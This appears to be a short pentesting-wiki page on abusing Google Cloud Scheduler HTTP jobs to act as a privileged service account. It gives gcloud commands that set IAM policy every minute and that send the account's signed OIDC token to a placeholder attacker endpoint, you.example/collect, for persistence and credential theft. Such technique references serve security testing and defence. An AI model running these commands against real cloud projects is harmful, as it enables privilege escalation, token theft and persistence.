Cloud Scheduler

A Cloud Scheduler HTTP job can attach a service account and present its OIDC or OAuth token to the target it calls. With cloudscheduler.jobs.create plus iam.serviceAccounts.actAs on a privileged account, you point a job at a Google API (or your own endpoint) and it authenticates as that account, which both escalates and persists on a schedule.

Create a job that acts as a service account#

bash
# OAuth token (googleapis.com targets): call an API as the SA
gcloud scheduler jobs create http privesc \
  --schedule "* * * * *" --uri "https://cloudresourcemanager.googleapis.com/v1/projects/<proj>:setIamPolicy" \
  --http-method POST --message-body '{...}' \
  --oauth-service-account-email <privileged-sa>@<proj>.iam.gserviceaccount.com

# OIDC token (your endpoint): capture the signed identity token of the SA
gcloud scheduler jobs create http exfil \
  --schedule "* * * * *" --uri "https://you.example/collect" \
  --oidc-service-account-email <privileged-sa>@<proj>.iam.gserviceaccount.com

Exploitation notes#

  • The OAuth variant calls Google APIs directly as the SA, so a job can grant you IAM or read secrets without you ever holding the token.
  • The OIDC variant leaks the SA's signed identity token to an endpoint you control each run.
  • A recurring schedule makes the job durable persistence until someone deletes it.

Tools#

  • gcloud (scheduler jobs create http).

References#

Cookie Consent

We use cookies to enhance your experience. Learn more